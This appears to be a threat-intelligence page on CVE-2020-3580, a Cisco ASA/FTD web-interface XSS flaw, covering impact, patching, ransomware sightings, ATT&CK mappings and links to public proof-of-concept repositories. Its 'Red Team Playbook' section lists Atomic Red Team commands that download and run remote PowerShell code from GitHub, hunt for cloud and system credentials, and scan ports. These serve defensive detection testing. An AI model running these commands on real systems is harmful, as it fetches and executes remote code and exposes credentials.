CVE-2020-3580

MEDIUM CISA KEV POC TTE 246d Pub 21/10 Upd 21/10

Overview

This vulnerability is a cross-site scripting (XSS) flaw arising from insufficient validation of user-supplied input in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software. Specifically, the affected component improperly sanitizes input parameters in the web interface, allowing injection of malicious script code. The vulnerability is localized to specific AnyConnect and WebVPN configurations within the web services interface.

Vulnerability Description

Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.

Impact

An unauthenticated attacker can exploit this vulnerability by convincing a user of the web services interface to click a specially crafted link, resulting in execution of arbitrary script code within the user's browser context. This can lead to theft of sensitive browser-based information, session hijacking, or interface defacement. The attack requires user interaction but no authentication, potentially compromising confidentiality and integrity of user sessions and data accessed through the affected web interface.

Solution

Cisco has released security updates addressing this vulnerability in specific versions of Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software. Administrators should apply the patches as detailed in Cisco Security Advisory cisco-sa-asaftd-xss-multiple-FCB3vPZe available at https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe. No alternative workarounds are documented; timely application of vendor-supplied patches is recommended to remediate the issue.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software arises from inadequate validation of user-supplied input. This weakness permits an unauthenticated, remote attacker to execute cross-site scripting (XSS) attacks against users interacting with the affected devices. By exploiting this flaw, an attacker can craft malicious links that, when clicked by a user, execute arbitrary script code within the context of the web services interface. This exploitation can lead to unauthorized access to sensitive information stored in the user's browser, such as cookies, session tokens, or other personal data.

Attack vectors for this vulnerability primarily involve social engineering tactics. An attacker may send a user a deceptive link that appears legitimate, prompting them to access the web services interface of the affected device. Once the user clicks the link, the malicious script executes, potentially redirecting the user to a phishing site or enabling the attacker to manipulate the user’s session. Furthermore, if the user has administrative access to the device, the consequences can be significantly more severe, allowing the attacker to gain control over the device and compromise the entire network infrastructure.

The real-world impact of this vulnerability can be substantial, particularly for organizations relying on Cisco's security products to protect their networks. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, or even a full compromise of the network. The business risks associated with such incidents include financial loss, reputational damage, regulatory penalties, and the potential for further attacks stemming from the initial breach. Organizations may also face increased scrutiny from stakeholders and customers, leading to a loss of trust and confidence in their security measures.

To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching affected Cisco products is crucial to close the security gaps. Additionally, employing web application firewalls (WAFs) can help filter out malicious traffic and prevent XSS attacks. User training and awareness programs are also essential, as they can equip employees with the knowledge to recognize phishing attempts and avoid clicking on suspicious links. Monitoring logs for unusual access patterns or behaviors can further aid in identifying potential exploitation attempts.

In conclusion, the vulnerabilities present in the web services interface of Cisco ASA and FTD Software pose significant threats to organizations that utilize these products. The potential for cross-site scripting attacks highlights the importance of robust input validation and user awareness. By adopting proactive detection and mitigation strategies, organizations can better protect themselves against the risks associated with these vulnerabilities, ensuring the integrity and security of their network environments.




CSURFACE threat intelligence has detected a modest but consistent uptick in activity related to CVE-2020-3580, reflected in a slight increase in telemetry signals and a marginal rise in the EPSS score. This trend indicates that adversaries continue to probe and potentially exploit the cross-site scripting vulnerabilities in Cisco ASA and FTD web interfaces. The persistence of publicly available proof-of-concept exploits further lowers the barrier for exploitation attempts. Notably, ransomware groups such as Akira remain linked to campaigns leveraging this vulnerability, underscoring its relevance in extortion-driven threat scenarios. While the overall risk level remains medium, the observed increase in exploitation attempts and sustained interest from ransomware actors suggest defenders should maintain heightened vigilance. This evolving landscape reinforces the importance of continuous monitoring to detect early signs of compromise and to understand attacker behaviors targeting these specific Cisco products.



Update 2 — July 03, 2026

CSURFACE threat intelligence has identified a notable uptick in exploitation attempts targeting CVE-2020-3580, reflected by a marked escalation in telemetry signals from our sensors. This increase, while moderate, signals sustained adversary interest, particularly from ransomware groups such as Akira and Sinobi, which continue to leverage this vulnerability in extortion campaigns. Concurrently, new proof-of-concept exploits have surfaced on public repositories, broadening the toolkit available to attackers and potentially lowering the technical barrier for exploitation. Although the EPSS score remains stable and high, indicating consistent exploitability, the combination of increased detection activity and expanded exploit resources elevates the operational risk. For defenders, this evolving threat landscape underscores the necessity of maintaining vigilant monitoring and rapid incident response capabilities. While the overall severity rating remains medium, the heightened exploitation activity and ransomware associations justify an increased emphasis on detection and threat hunting efforts related to Cisco ASA and FTD web services interfaces.

Affected Products (9)

Vendor Product Version CPE
cisco Cisco Firepower Threat Defense All cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*
cisco Cisco Firepower Threat Defense All cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*
cisco Cisco Firepower Threat Defense All cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*
cisco Cisco Adaptive Security Appliance Software All cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
cisco Cisco Adaptive Security Appliance Software All cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
cisco Cisco Adaptive Security Appliance Software All cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
cisco Cisco Adaptive Security Appliance Software All cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
cisco Cisco Adaptive Security Appliance Software All cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
cisco Cisco Adaptive Security Appliance Software All cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

GitHub PoCs (4)

Repository Author Stars Forks Date Link
adarshvs/CVE-2020-3580
Automated bulk IP or domain scanner for CVE 2020 3580. Cisco ASA and FTD XSS hunter.
adarshvs 19 4 2021-06-28 View
Hudi233/CVE-2020-3580
Hudi233 9 4 2021-06-25 View
catatonicprime/CVE-2020-3580
Additional exploits for XSS in Cisco ASA devices discovered by PTSwarm
catatonicprime 2 1 2022-07-15 View
cruxN3T/CVE-2020-3580
Cisco ASA XSS CVE-2020-3580
cruxN3T 0 0 2022-06-24 View
Exploited in Wild CONFIRMED
Ransomware IN USE
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

13 events
2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-09
Exploited by sinobi

Ransomware group known to exploit this vulnerability (274 known victims)

2026-05-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-05
Exploited by akira

Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)

2026-04-05
Exploited by akira

Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)

2026-03-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-16
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2021-11-03
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2021-06-25
PoC Published (4 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Cross-Site Scripting
99% xss

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059 Command and Scripting Interpreter Kill Chain execution ESXi, IaaS, Identity Provider, Linux, macOS, Network Devices, Office Suite, Windows
T1542.001 System Firmware Kill Chain persistence, defense-evasion Windows, Network Devices
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1046 Network Service Discovery Kill Chain discovery Containers, IaaS, Linux, macOS, Network Devices, Windows
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-63 Cross-Site Scripting (XSS)
93%
High Very High
CAPEC-588 DOM-Based XSS
89%
High Very High
CAPEC-591 Reflected XSS
86%
High Very High
CAPEC-592 Stored XSS
83%
High Very High
CAPEC-209 XSS Using MIME Type Mismatch
76%
Medium

Red Team Playbook

33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1046 Network Service Discovery for Containers containers Shell
Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and...
Command (Shell)
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
T1046 Port Scan Linux, macOS Bash
Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
Command (Bash)
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
T1046 Port Scan NMap for Windows Windows PowerShell Privileged
Scan ports to check for listening ports for the local host 127.0.0.1
Command (PowerShell)
nmap #{host_to_scan}
T1046 Port Scan Nmap Linux, macOS Shell Privileged
Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
Command (Shell)
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
T1046 Port Scan using nmap (Port range) Linux, macOS Shell Privileged
Scan multiple ports to check for listening ports with nmap
Command (Shell)
nmap -Pn -sV -p #{port_range} #{host}
T1046 Port Scan using python Windows PowerShell
Scan ports to check for listening ports with python
Command (PowerShell)
python "#{filename}" -i #{host_ip}
T1046 Port-Scanning /24 Subnet with PowerShell Windows PowerShell
Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask. The connection attempts to use a timeout parameter in...
Command (PowerShell)
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
    $ip_list = $ipAddr -split ","
    $ip_list = $ip_list.ForEach({ $_.Trim() })
    Write-Host "[i] IP Address List: $ip_list"

    $ports = #{port_list}

    foreach ($ip in $ip_list) {
        foreach ($port in $ports) {
            Write-Host "[i] Establishing connection to: $ip : $port"
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} elseif ($ipAddr -notlike "*,*") {
    if ($ipAddr -eq "") {
        # Assumes the "primary" interface is shown at the top
        $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
        Write-Host "[i] Using Interface $interface"
        $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
    }
    Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
    $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
    # Always assumes /24 subnet
    Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"

    $ports = #{port_list}
    $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }

    foreach ($ip in $subnetIPs) {
        foreach ($port in $ports) {
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} else {
    Write-Host "[Error] Invalid Inputs"
    exit 1
}
T1046 Remote Desktop Services Discovery via PowerShell Windows PowerShell Privileged
Availability of remote desktop services can be checked using get- cmdlet of PowerShell
Command (PowerShell)
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
T1046 WinPwn - MS17-10 Windows PowerShell
Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
T1046 WinPwn - bluekeep Windows PowerShell
Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
T1046 WinPwn - fruit Windows PowerShell
Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
T1046 WinPwn - spoolvulnscan Windows PowerShell
Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
T1059 AutoIt Script Execution Windows PowerShell
An adversary may attempt to execute suspicious or malicious script using AutoIt software instead of regular terminal like powershell or cmd. Calculator will popup when the script is executed successfully.
Command (PowerShell)
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
T1542.001 UEFI Persistence via Wpbbin.exe File Creation Windows PowerShell Privileged
Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms. - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c -...
Command (PowerShell)
echo "Creating %systemroot%\wpbbin.exe"      
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (3)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2020-3580
tools.cisco.com
GitHub CVE vendor-advisory x_refsource_CISCO
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-3580